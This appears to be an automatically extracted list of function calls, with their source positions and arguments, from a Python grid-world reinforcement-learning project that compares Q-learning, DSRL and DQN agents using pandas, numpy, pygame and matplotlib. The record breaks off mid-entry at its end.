env_list = [2,3] # alg_list = ["QL", "DSRL", "DSRL_object_near", "DQN"] # for Env in env_list: # for Alg in alg_list: # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save)
[((58, 0, 58, 42), 'pandas.set_option', 'pd.set_option', ({(58, 14, 58, 35): '"""display.max_columns"""', (58, 37, 58, 41): 'None'}, {}), "('display.max_columns', None)", True, 'import pandas as pd\n'), ((59, 0, 59, 43), 'pandas.set_option', 'pd.set_option', ({(59, 14, 59, 34): '"""display.large_repr"""', (59, 36, 59, 42): '"""info"""'}, {}), "('display.large_repr', 'info')", True, 'import pandas as pd\n'), ((61, 0, 61, 45), 'pandas.set_option', 'pd.set_option', ({(61, 14, 61, 29): '"""display.width"""', (61, 31, 61, 44): 'desired_width'}, {}), "('display.width', desired_width)", True, 'import pandas as pd\n'), ((62, 0, 62, 29), 'pandas.set_option', 'pd.set_option', ({(62, 14, 62, 25): '"""precision"""', (62, 27, 62, 28): '(4)'}, {}), "('precision', 4)", True, 'import pandas as pd\n'), ((65, 0, 65, 19), 'numpy.random.seed', 'np.random.seed', ({(65, 15, 65, 18): '(123)'}, {}), '(123)', True, 'import numpy as np\n'), ((66, 0, 66, 13), 'pygame.init', 'pygame.init', ({}, {}), '()', False, 'import pygame\n'), ((67, 5, 67, 35), 'pprint.PrettyPrinter', 'pprint.PrettyPrinter', (), '', False, 'import pprint\n'), ((96, 12, 96, 50), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(96, 32, 96, 45): '"""comicsansms"""', (96, 47, 96, 49): '13'}, {}), "('comicsansms', 13)", False, 'import pygame\n'), ((97, 16, 97, 48), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(97, 36, 97, 43): '"""arial"""', (97, 45, 97, 47): '13'}, {}), "('arial', 13)", False, 'import pygame\n'), ((98, 17, 98, 60), 'pygame.font.SysFont', 'pygame.font.SysFont', (), '', False, 'import pygame\n'), ((99, 0, 99, 18), 'pygame.font.init', 'pygame.font.init', ({}, {}), '()', False, 'import pygame\n'), ((520, 12, 520, 50), 'Class.Agent', 'Class.Agent', ({(520, 24, 520, 31): '"""agent"""', (520, 33, 520, 40): 'x_agent', (520, 42, 520, 49): 'y_agent'}, {}), "('agent', x_agent, y_agent)", False, 'import Class\n'), ((853, 8, 853, 23), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((1070, 12, 1070, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1071, 17, 1071, 39), 'time.strftime', 'time.strftime', ({(1071, 31, 1071, 38): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1074, 15, 1074, 29), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1075, 22, 1075, 36), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1076, 19, 1076, 33), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1077, 21, 1077, 35), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1546, 13, 1546, 24), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1547, 18, 1547, 40), 'time.strftime', 'time.strftime', ({(1547, 32, 1547, 39): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((163, 14, 163, 32), 'Class.Obj', 'Class.Obj', ({(163, 24, 163, 26): 'tp', (163, 28, 163, 31): 'loc'}, {}), '(tp, loc)', False, 'import Class\n'), ((182, 14, 182, 36), 'Class.Obj', 'Class.Obj', ({(182, 24, 182, 26): 'tp', (182, 28, 182, 35): 'loc_dif'}, {}), '(tp, loc_dif)', False, 'import Class\n'), ((224, 17, 225, 39), 'numpy.matrix', 'np.matrix', ({(224, 27, 225, 38): '[[0, 0, 0], [0, 1, 0]]'}, {}), '([[0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((226, 17, 227, 39), 'numpy.matrix', 'np.matrix', ({(226, 27, 227, 38): '[[0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((478, 17, 480, 39), 'numpy.matrix', 'np.matrix', ({(478, 27, 480, 38): '[[0, 0, 0], [0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((481, 17, 483, 39), 'numpy.matrix', 'np.matrix', ({(481, 27, 483, 38): '[[0, 1, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((552, 16, 552, 54), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((612, 16, 612, 30), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((698, 18, 698, 58), 'numpy.zeros', 'np.zeros', ({(698, 27, 698, 57): '(inputs.shape[0], num_actions)'}, {}), '((inputs.shape[0], num_actions))', True, 'import numpy as np\n'), ((770, 19, 770, 45), 'numpy.argmax', 'np.argmax', ({(770, 29, 770, 44): 'model.loc[s][0]'}, {}), '(model.loc[s][0])', True, 'import numpy as np\n'), ((856, 19, 856, 41), 'random.choice', 'random.choice', ({(856, 33, 856, 40): 'actions'}, {}), '(actions)', False, 'import random\n'), ((1062, 45, 1062, 56), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((1062, 58, 1062, 83), 'os.path.dirname', 'os.path.dirname', ({(1062, 74, 1062, 82): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((1080, 35, 1080, 88), 'pygame.display.set_mode', 'pygame.display.set_mode', ({(1080, 59, 1080, 87): '(400 + 37 * 5, 330 + 37 * 5)'}, {}), '((400 + 37 * 5, 330 + 37 * 5))', False, 'import pygame\n'), ((1099, 16, 1099, 27), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1100, 21, 1100, 43), 'time.strftime', 'time.strftime', ({(1100, 35, 1100, 42): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1372, 14, 1372, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1373, 19, 1373, 41), 'time.strftime', 'time.strftime', ({(1373, 33, 1373, 40): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1387, 24, 1387, 59), 'pandas.DataFrame', 'pd.DataFrame', ({(1387, 37, 1387, 58): "{'Score': score_list}"}, {}), "({'Score': score_list})", True, 'import pandas as pd\n'), ((1388, 26, 1388, 65), 'pandas.DataFrame', 'pd.DataFrame', ({(1388, 39, 1388, 64): "{'Percent': percent_list}"}, {}), "({'Percent': percent_list})", True, 'import pandas as pd\n'), ((1389, 23, 1389, 62), 'pandas.DataFrame', 'pd.DataFrame', ({(1389, 36, 1389, 61): "{'Batch_loss': loss_list}"}, {}), "({'Batch_loss': loss_list})", True, 'import pandas as pd\n'), ((1390, 25, 1390, 63), 'pandas.DataFrame', 'pd.DataFrame', ({(1390, 38, 1390, 62): "{'Time': [time_elapsed]}"}, {}), "({'Time': [time_elapsed]})", True, 'import pandas as pd\n'), ((1392, 19, 1392, 82), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1393, 26, 1393, 98), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1394, 23, 1394, 89), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1395, 25, 1395, 95), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1431, 25, 1431, 56), 'numpy.average', 'np.average', ({(1431, 36, 1431, 55): 'avg_last_score_list'}, {}), '(avg_last_score_list)', True, 'import numpy as np\n'), ((1466, 17, 1466, 73), 'pandas.ExcelWriter', 'pd.ExcelWriter', (), '', True, 'import pandas as pd\n'), ((205, 12, 205, 36), 'numpy.zeros', 'np.zeros', ({(205, 21, 205, 35): '(v_max, h_max)'}, {}), '((v_max, h_max))', True, 'import numpy as np\n'), ((234, 17, 235, 39), 'numpy.matrix', 'np.matrix', ({(234, 27, 235, 38): '[[0, 0, 0], [0, 0, 1]]'}, {}), '([[0, 0, 0], [0, 0, 1]])', True, 'import numpy as np\n'), ((236, 17, 237, 39), 'numpy.matrix', 'np.matrix', ({(236, 27, 237, 38): '[[0, 0, 1], [0, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0]])', True, 'import numpy as np\n'), ((490, 17, 492, 39), 'numpy.matrix', 'np.matrix', ({(490, 27, 492, 38): '[[0, 0, 0], [0, 0, 1], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 1], [0, 0, 0]])', True, 'import numpy as np\n'), ((493, 17, 495, 39), 'numpy.matrix', 'np.matrix', ({(493, 27, 495, 38): '[[0, 0, 1], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((556, 16, 556, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((616, 18, 618, 59), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((619, 16, 619, 43), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((701, 32, 701, 86), 'numpy.random.randint', 'np.random.randint', (), '', True, 'import numpy as np\n'), ((244, 17, 245, 39), 'numpy.matrix', 'np.matrix', ({(244, 27, 245, 38): '[[1, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((246, 17, 247, 39), 'numpy.matrix', 'np.matrix', ({(246, 27, 247, 38): '[[0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((502, 17, 504, 39), 'numpy.matrix', 'np.matrix', ({(502, 27, 504, 38): '[[1, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((505, 17, 507, 39), 'numpy.matrix', 'np.matrix', ({(505, 27, 507, 38): '[[0, 1, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((517, 23, 517, 47), 'Class.Wall', 'Class.Wall', ({(517, 34, 517, 40): '"""wall"""', (517, 42, 517, 43): 'x', (517, 45, 517, 46): 'y'}, {}), "('wall', x, y)", False, 'import Class\n'), ((527, 27, 527, 67), 'Class.Positivo', 'Class.Positivo', ({(527, 42, 527, 52): '"""positivo"""', (527, 54, 527, 59): 'y + 1', (527, 61, 527, 66): 'x + 1'}, {}), "('positivo', y + 1, x + 1)", False, 'import Class\n'), ((535, 27, 535, 67), 'Class.Negativo', 'Class.Negativo', ({(535, 42, 535, 52): '"""negativo"""', (535, 54, 535, 59): 'y + 1', (535, 61, 535, 66): 'x + 1'}, {}), "('negativo', y + 1, x + 1)", False, 'import Class\n'), ((560, 16, 560, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((766, 23, 766, 45), 'numpy.array', 'np.array', ({(766, 32, 766, 44): '[s, s, s, s]'}, {}), '([s, s, s, s])', True, 'import numpy as np\n'), ((766, 47, 766, 88), 'numpy.array', 'np.array', ({(766, 56, 766, 87): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((767, 35, 767, 51), 'numpy.zeros', 'np.zeros', ({(767, 44, 767, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((843, 23, 843, 45), 'random.choice', 'random.choice', ({(843, 37, 843, 44): 'actions'}, {}), '(actions)', False, 'import random\n'), ((849, 16, 849, 31), 'numpy.argmax', 'np.argmax', ({(849, 26, 849, 30): 'q[0]'}, {}), '(q[0])', True, 'import numpy as np\n'), ((880, 23, 880, 57), 'numpy.array', 'np.array', ({(880, 32, 880, 56): '[s_t1, s_t1, s_t1, s_t1]'}, {}), '([s_t1, s_t1, s_t1, s_t1])', True, 'import numpy as np\n'), ((880, 59, 880, 100), 'numpy.array', 'np.array', ({(880, 68, 880, 99): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((881, 35, 881, 51), 'numpy.zeros', 'np.zeros', ({(881, 44, 881, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((884, 23, 884, 53), 'numpy.array', 'np.array', ({(884, 32, 884, 52): '[s_t, s_t, s_t, s_t]'}, {}), '([s_t, s_t, s_t, s_t])', True, 'import numpy as np\n'), ((884, 55, 884, 96), 'numpy.array', 'np.array', ({(884, 64, 884, 95): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((885, 35, 885, 51), 'numpy.zeros', 'np.zeros', ({(885, 44, 885, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((1157, 16, 1157, 37), 'pygame.display.flip', 'pygame.display.flip', ({}, {}), '()', False, 'import pygame\n'), ((1162, 16, 1162, 28), 'time.sleep', 'sleep', ({(1162, 22, 1162, 27): 'speed'}, {}), '(speed)', False, 'from time import sleep\n'), ((1417, 30, 1417, 56), 'os.path.dirname', 'os.path.dirname', ({(1417, 46, 1417, 55): 'save_path'}, {}), '(save_path)', False, 'import os\n'), ((1432, 33, 1432, 61), 'pandas.Series', 'pd.Series', ({(1432, 43, 1432, 60): "{'Run_Conf': 'A'}"}, {}), "({'Run_Conf': 'A'})", True, 'import pandas as pd\n'), ((1433, 33, 1433, 63), 'pandas.Series', 'pd.Series', ({(1433, 43, 1433, 62): "{'Env_conf': s_env}"}, {}), "({'Env_conf': s_env})", True, 'import pandas as pd\n'), ((1434, 33, 1434, 61), 'pandas.Series', 'pd.Series', ({(1434, 43, 1434, 60): "{'Algort': s_alg}"}, {}), "({'Algort': s_alg})", True, 'import pandas as pd\n'), ((1435, 33, 1435, 62), 'pandas.Series', 'pd.Series', ({(1435, 43, 1435, 61): "{'Learn': s_learn}"}, {}), "({'Learn': s_learn})", True, 'import pandas as pd\n'), ((1436, 33, 1436, 60), 'pandas.Series', 'pd.Series', ({(1436, 43, 1436, 59): "{'Load': s_load}"}, {}), "({'Load': s_load})", True, 'import pandas as pd\n'), ((1437, 33, 1437, 65), 'pandas.Series', 'pd.Series', ({(1437, 43, 1437, 64): "{'Samples': s_sample}"}, {}), "({'Samples': s_sample})", True, 'import pandas as pd\n'), ((1438, 33, 1438, 66), 'pandas.Series', 'pd.Series', ({(1438, 43, 1438, 65): "{'Episode': s_episode}"}, {}), "({'Episode': s_episode})", True, 'import pandas as pd\n'), ((1439, 33, 1439, 68), 'pandas.Series', 'pd.Series', ({(1439, 43, 1439, 67): "{'Max_steps': max_steps}"}, {}), "({'Max_steps': max_steps})", True, 'import pandas as pd\n'), ((1440, 33, 1440, 76), 'pandas.Series', 'pd.Series', ({(1440, 43, 1440, 75): "{'s_cond_to_end': s_cond_to_end}"}, {}), "({'s_cond_to_end': s_cond_to_end})", True, 'import pandas as pd\n'), ((1441, 33, 1441, 60), 'pandas.Series', 'pd.Series', ({(1441, 43, 1441, 59): "{'Auto': s_auto}"}, {}), "({'Auto': s_auto})", True, 'import pandas as pd\n'), ((1442, 33, 1442, 64), 'pandas.Series', 'pd.Series', ({(1442, 43, 1442, 63): "{'Server': s_server}"}, {}), "({'Server': s_server})", True, 'import pandas as pd\n'), ((1443, 33, 1443, 62), 'pandas.Series', 'pd.Series', ({(1443, 43, 1443, 61): "{'Print': s_print}"}, {}), "({'Print': s_print})", True, 'import pandas as pd\n'), ((1444, 33, 1444, 62), 'pandas.Series', 'pd.Series', ({(1444, 43, 1444, 61): "{'MODEL CONF': ''}"}, {}), "({'MODEL CONF': ''})", True, 'import pandas as pd\n'), ((1445, 33, 1445, 58), 'pandas.Series', 'pd.Series', ({(1445, 43, 1445, 57): "{'alfa': alfa}"}, {}), "({'alfa': alfa})", True, 'import pandas as pd\n'), ((1446, 33, 1446, 60), 'pandas.Series', 'pd.Series', ({(1446, 43, 1446, 59): "{'gamma': gamma}"}, {}), "({'gamma': gamma})", True, 'import pandas as pd\n'), ((1447, 33, 1447, 58), 'pandas.Series', 'pd.Series', ({(1447, 43, 1447, 57): "{'Prob': Prob}"}, {}), "({'Prob': Prob})", True, 'import pandas as pd\n'), ((1448, 33, 1448, 80), 'pandas.Series', 'pd.Series', ({(1448, 43, 1448, 79): "{'N_actions': net_conf['N_actions']}"}, {}), "({'N_actions': net_conf['N_actions']})", True, 'import pandas as pd\n'), ((1449, 33, 1449, 82), 'pandas.Series', 'pd.Series', ({(1449, 43, 1449, 81): "{'Max_memory': net_conf['Max_memory']}"}, {}), "({'Max_memory': net_conf['Max_memory']})", True, 'import pandas as pd\n'), ((1450, 33, 1450, 84), 'pandas.Series', 'pd.Series', ({(1450, 43, 1450, 83): "{'Hidden_size': net_conf['Hidden_size']}"}, {}), "({'Hidden_size': net_conf['Hidden_size']})", True, 'import pandas as pd\n'), ((1451, 33, 1451, 82), 'pandas.Series', 'pd.Series', ({(1451, 43, 1451, 81): "{'Batch_size': net_conf['Batch_size']}"}, {}), "({'Batch_size': net_conf['Batch_size']})", True, 'import pandas as pd\n'), ((1452, 33, 1452, 80), 'pandas.Series', 'pd.Series', ({(1452, 43, 1452, 79): "{'Optimizer': net_conf['Optimizer']}"}, {}), "({'Optimizer': net_conf['Optimizer']})", True, 'import pandas as pd\n'), ((1453, 33, 1453, 62), 'pandas.Series', 'pd.Series', ({(1453, 43, 1453, 61): "{'lr': op_conf[0]}"}, {}), "({'lr': op_conf[0]})", True, 'import pandas as pd\n'), ((1454, 33, 1454, 66), 'pandas.Series', 'pd.Series', ({(1454, 43, 1454, 65): "{'beta_1': op_conf[1]}"}, {}), "({'beta_1': op_conf[1]})", True, 'import pandas as pd\n'), ((1455, 33, 1455, 66), 'pandas.Series', 'pd.Series', ({(1455, 43, 1455, 65): "{'beta_2': op_conf[2]}"}, {}), "({'beta_2': op_conf[2]})", True, 'import pandas as pd\n'), ((1456, 33, 1456, 67), 'pandas.Series', 'pd.Series', ({(1456, 43, 1456, 66): "{'epsilon': op_conf[3]}"}, {}), "({'epsilon': op_conf[3]})", True, 'import pandas as pd\n'), ((1457, 33, 1457, 65), 'pandas.Series', 'pd.Series', ({(1457, 43, 1457, 64): "{'decay': op_conf[4]}"}, {}), "({'decay': op_conf[4]})", True, 'import pandas as pd\n'), ((1458, 33, 1458, 63), 'pandas.Series', 'pd.Series', ({(1458, 43, 1458, 62): "{'rho': op_conf[5]}"}, {}), "({'rho': op_conf[5]})", True, 'import pandas as pd\n'), ((1459, 33, 1459, 52), 'pandas.Series', 'pd.Series', ({(1459, 43, 1459, 51): "{'': ''}"}, {}), "({'': ''})", True, 'import pandas as pd\n'), ((1460, 33, 1460, 73), 'pandas.Series', 'pd.Series', ({(1460, 43, 1460, 72): "{'AVG SCORE': avg_last_score}"}, {}), "({'AVG SCORE': avg_last_score})", True, 'import pandas as pd\n'), ((254, 17, 255, 36), 'numpy.matrix', 'np.matrix', ({(254, 27, 255, 35): '[[0, 0], [0, 0]]'}, {}), '([[0, 0], [0, 0]])', True, 'import numpy as np\n'), ((256, 17, 257, 36), 'numpy.matrix', 'np.matrix', ({(256, 27, 257, 35): '[[0, 0], [0, 1]]'}, {}), '([[0, 0], [0, 1]])', True, 'import numpy as np\n'), ((564, 16, 564, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((788, 26, 790, 67), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((791, 26, 791, 53), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((799, 27, 799, 69), 'numpy.sqrt', 'np.sqrt', ({(799, 35, 799, 68): 's_n_c_abs[0] ** 2 + s_n_c_abs[1] ** 2'}, {}), '(s_n_c_abs[0] ** 2 + s_n_c_abs[1] ** 2)', True, 'import numpy as np\n'), ((921, 26, 923, 67), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((924, 26, 924, 53), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((1167, 33, 1167, 51), 'pygame.event.get', 'pygame.event.get', ({}, {}), '()', False, 'import pygame\n'), ((1359, 20, 1359, 41), 'pygame.display.flip', 'pygame.display.flip', ({}, {}), '()', False, 'import pygame\n'), ((1419, 28, 1419, 54), 'os.path.dirname', 'os.path.dirname', ({(1419, 44, 1419, 53): 'save_path'}, {}), '(save_path)', False, 'import os\n'), ((264, 17, 264, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((265, 17, 265, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((568, 16, 568, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1299, 35, 1299, 89), 'Class.Positivo', 'Class.Positivo', ({(1299, 50, 1299, 60): '"""positivo"""', (1299, 62, 1299, 74): 'agent.pos[0]', (1299, 76, 1299, 88): 'agent.pos[1]'}, {}), "('positivo', agent.pos[0], agent.pos[1])", False, 'import Class\n'), ((1307, 35, 1307, 89), 'Class.Negativo', 'Class.Negativo', ({(1307, 50, 1307, 60): '"""negativo"""', (1307, 62, 1307, 74): 'agent.pos[0]', (1307, 76, 1307, 88): 'agent.pos[1]'}, {}), "('negativo', agent.pos[0], agent.pos[1])", False, 'import Class\n'), ((267, 16, 267, 46), 'random.randrange', 'random.randrange', ({(267, 33, 267, 34): '0', (267, 36, 267, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((268, 16, 268, 46), 'random.randrange', 'random.randrange', ({(268, 33, 268, 34): '0', (268, 36, 268, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((279, 17, 279, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((280, 17, 280, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((572, 16, 572, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1170, 28, 1170, 41), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((1171, 28, 1171, 38), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((282, 16, 282, 46), 'random.randrange', 'random.randrange', ({(282, 33, 282, 34): '0', (282, 36, 282, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((283, 16, 283, 46), 'random.randrange', 'random.randrange', ({(283, 33, 283, 34): '0', (283, 36, 283, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((294, 17, 294, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((295, 17, 295, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((576, 16, 576, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1208, 32, 1208, 45), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((1209, 32, 1209, 42), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((1212, 32, 1212, 52), 'matplotlib.pyplot.plot', 'plt.plot', ({(1212, 41, 1212, 51): 'score_list'}, {}), '(score_list)', True, 'import matplotlib.pyplot as plt\n'), ((1213, 32, 1213, 51), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1213, 43, 1213, 50): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((1214, 32, 1214, 57), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1214, 43, 1214, 56): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1215, 32, 1215, 69), 'matplotlib.pyplot.title', 'plt.title', ({(1215, 42, 1215, 68): '"""Performance of the Agent"""'}, {}), "('Performance of the Agent')", True, 'import matplotlib.pyplot as plt\n'), ((1216, 32, 1216, 42), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1218, 32, 1218, 54), 'matplotlib.pyplot.plot', 'plt.plot', ({(1218, 41, 1218, 53): 'percent_list'}, {}), '(percent_list)', True, 'import matplotlib.pyplot as plt\n'), ((1219, 32, 1219, 69), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1219, 43, 1219, 68): '"""Percentage of objects +"""'}, {}), "('Percentage of objects +')", True, 'import matplotlib.pyplot as plt\n'), ((1220, 32, 1220, 57), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1220, 43, 1220, 56): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1221, 32, 1221, 77), 'matplotlib.pyplot.title', 'plt.title', ({(1221, 42, 1221, 76): '"""Episode over 100 times step each"""'}, {}), "('Episode over 100 times step each')", True, 'import matplotlib.pyplot as plt\n'), ((1222, 32, 1222, 42), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((297, 16, 297, 46), 'random.randrange', 'random.randrange', ({(297, 33, 297, 34): '0', (297, 36, 297, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((298, 16, 298, 46), 'random.randrange', 'random.randrange', ({(298, 33, 298, 34): '0', (298, 36, 298, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((309, 17, 311, 39), 'numpy.matrix', 'np.matrix', ({(309, 27, 311, 38): '[[0, 0, 0], [0, 0, 0], [1, 0, 1]]'}, {}), '([[0, 0, 0], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n'), ((312, 17, 314, 39), 'numpy.matrix', 'np.matrix', ({(312, 27, 314, 38): '[[1, 0, 1], [0, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((580, 16, 580, 84), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1224, 36, 1224, 55), 'matplotlib.pyplot.plot', 'plt.plot', ({(1224, 45, 1224, 54): 'loss_list'}, {}), '(loss_list)', True, 'import matplotlib.pyplot as plt\n'), ((1225, 36, 1225, 54), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1225, 47, 1225, 53): '"""loss"""'}, {}), "('loss')", True, 'import matplotlib.pyplot as plt\n'), ((1226, 36, 1226, 61), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1226, 47, 1226, 60): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1227, 36, 1227, 59), 'matplotlib.pyplot.title', 'plt.title', ({(1227, 46, 1227, 58): '"""batch_loss"""'}, {}), "('batch_loss')", True, 'import matplotlib.pyplot as plt\n'), ((1228, 36, 1228, 46), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((321, 17, 323, 39), 'numpy.matrix', 'np.matrix', ({(321, 27, 323, 38): '[[1, 0, 0], [0, 0, 0], [0, 0, 1]]'}, {}), '([[1, 0, 0], [0, 0, 0], [0, 0, 1]])', True, 'import numpy as np\n'), ((324, 17, 326, 39), 'numpy.matrix', 'np.matrix', ({(324, 27, 326, 38): '[[0, 0, 1], [0, 0, 0], [1, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0], [1, 0, 0]])', True, 'import numpy as np\n'), ((586, 15, 586, 78), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((333, 17, 339, 51), 'numpy.matrix', 'np.matrix', ({(333, 27, 339, 50): '[[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0,\n 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1,\n 0, 0, 0, 1]]'}, {}), '([[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0,\n 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 1]])', True, 'import numpy as np\n'), ((340, 17, 346, 51), 'numpy.matrix', 'np.matrix', ({(340, 27, 346, 50): '[[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0,\n 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0,\n 0, 1, 0, 0]]'}, {}), '([[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0,\n 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0]])', True, 'import numpy as np\n'), ((363, 17, 363, 51), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((364, 17, 364, 51), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((584, 36, 584, 52), 'json.load', 'json.load', ({(584, 46, 584, 51): 'jfile'}, {}), 